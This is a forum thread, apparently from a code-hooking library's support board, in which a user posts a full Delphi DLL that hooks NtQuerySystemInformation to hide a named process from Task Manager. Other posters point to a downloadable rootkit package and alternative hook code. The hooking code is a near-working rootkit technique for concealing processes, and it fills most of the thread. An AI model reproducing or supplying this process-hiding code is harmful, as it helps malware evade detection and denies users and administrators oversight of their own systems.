Why doesnt this work?

[Taner]

HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);

It say "Undeclared Identifier: NtQuerySystemInformation" to the first parameter

[madshi]

Always use HookAPI, if possible. HookCode is only meant to be used for non-exported functions.

Btw, why do you want to hook NtQuerySystemInformation?

[Taner]

I want to make a process invisible.
But don't think that it will be a virus. I just want to show my friend (Delphi coder too) that it is possible to hide a process in the task manager. He says its impossible
But as I said I wont abuse it, I read you license agreement and accepted

But well, shouldn't this work? It doesn't it

Code: Select all

Library Proof;

uses windows, MadCodeHook;

var NtQuerySystemInformationNextHook:function(
    SystemInformationClass: DWord;
    SystemInformation: Pointer;
    SystemInformationLength: ULong;
    ReturnLength:PULong): ULong;stdcall;

type
  IO_COUNTERS = record
    ReadOperationCount:Int64;
    WriteOperationCount:Int64;
    OtherOperationCount:Int64;
    ReadTransferCount:Int64;
    WriteTransferCount:Int64;
    OtherTransferCount:Int64;
  end;

type
  VM_COUNTERS = record
    PeakVirtualSize:ULONG;
    VirtualSize:ULONG;
    PageFaultCount:ULONG;
    PeakWorkingSetSize:ULONG;
    WorkingSetSize:ULONG;
    QuotaPeakedPagedPoolUsage:ULONG;
    QuotaPagedPoolUsage:ULONG;
    QuotaPeakNonPagedPoolUsage:ULONG;
    QuotaNonPagedPoolUsage:ULONG;
    PagefileUsage:ULONG;
    PeakPagefileUsage:ULONG;
  end;

type
  SYSTEM_PROCESS = record
    NextEntryDelta:ULONG;
    ThreadCount:ULONG;
    Reserved:array[0..5] of ULONG;
    CreateTime:LARGE_INTEGER;
    UserTime:LARGE_INTEGER;
    KernelTime:LARGE_INTEGER;
    ProcessName:PWideChar;
    BasePriority:DWORD;
    ProcessID:ULONG;
    InheritedFromProcessID:ULONG;
    HandleCount:ULONG;
    Reserved2:array[0..1] of ULONG;
    VmCounters:VM_COUNTERS;
    IoCounters:IO_COUNTERS;
    Threads:Pointer;
end;

type PSYSTEM_PROCESS = ^SYSTEM_PROCESS;


function NtQuerySystemInformationCallback(
         SystemInformationClass:DWORD;
         SystemInformation:Pointer;
         SystemInformationLength:ULONG;
         ReturnLength:PULONG):ULONG;
var iChanged:Integer;
    pCurrent, pLast:PSYSTEM_PROCESS;
begin
  result := NtQuerySystemInformationNextHook(
            SystemInformationClass,
            SystemInformation,
            SystemInformationLength,
            ReturnLength);
  iChanged:=0;
  if (result <> 0) then exit;
  if (SystemInformationClass <> 5) then exit;
  pCurrent := PSYSTEM_PROCESS(SystemInformation);
  pLast := nil;
  while (pCurrent <> nil) do
  begin
    if (WideCharToString(pCurrent.ProcessName) = 'IEXPLORE.EXE') then
    begin
      inc(iChanged);
      if (pLast <> nil) then
      begin
        if (pCurrent.NextEntryDelta <> 0) then
        begin
          inc(pLast.NextEntryDelta, pCurrent.NextEntryDelta);
        end //NextEntryDelta <> 0
        else
        begin
          pLast.NextEntryDelta := 0;
        end //NextEntryDelta = 0
      end //pLast <> nil
      else
      begin
        if (pCurrent.NextEntryDelta <> 0) then
        begin
        SystemInformation := Pointer(DWORD(SystemInformation) + pCurrent.NextEntryDelta);
        end
        else
        begin
          SystemInformation := nil;
        end;
      end; //pLast = nil
    end; //found our proc
    if (iChanged = 0) then
    begin
      pLast := pCurrent;
    end;
    if (pCurrent.NextEntryDelta <> 0) then
    begin
    pCurrent := PSYSTEM_PROCESS(Pointer(DWORD(pCurrent) + pCurrent.NextEntryDelta));
    end
    else pCurrent := nil;
  end;
end;


begin
  //HookCode(@NtQuerySystemInformation, @NtQuerySystemInformationCallback, @NtQuerySystemInformationNextHook);
  HookAPI('Ntdll.dll','NtQuerySystemInformation',@NtQuerySystemInformationCallback,@NtQuerySystemInformationNextHook);
end.

[madshi]

Don't know, maybe "if (WideCharToString(pCurrent.ProcessName) = 'IEXPLORE.EXE') then" fails? Not sure whether NtQuerySystemInformation returns all caps.

Btw, you can hook NtQuerySystemInformation only with the commercial version of madCodeHook. This API is locked in the non-commercial version, so that virus/trojan programmers don't get tempted to misuse madCodeHook.

[Taner]

damn it, hab keine 150$
aye, whatever, i'll try to find another way to show my friend that it's possible. thanks anyway worked for the whole source for nothing

[Runner]

If you really want to hook NtQuerySystemInformation that much visit http://iamaphex.net and download the file AFXRK2K4.zip. Inside is an Exe and a dll delphi project which hooks the above mentioned API. I tried it and it works. You can even inject it with madCodeHook. But please don't use it for ill purposes.

[nildo]

I hate aphex code. There are many cases witch his code does not work. bah... MadCodeHook owns!

[madshi]

[Taner]

Yeah MadCodeHook surely owns but I will use Aph3x thingy only to show my friend that hiding processes work.
and one funny thingy is that aph3x coded the TibiaBot with MadCodeHook although he had his own codehook. this is the best proof that MCHook owns

[nildo]

Do a test with AfxCodeHook, put a ShowMessage at the first line of a function and try to hook that function

My and MadCodeHook solution works perfectly, but Aphex does not recalculate CALLs before alocating the function into another place

[Runner]

It was just a suggestion. I to agree that madCodeHook is way better product

[uall]

madCodeHook must be a better product, because madshi is selling it
i have implemented a little code hook
www.arschvoll.net/myhook.txt
it should be able to hook NtQuerySystemInformation but its not recalculating a jump or call on the begin of the hook function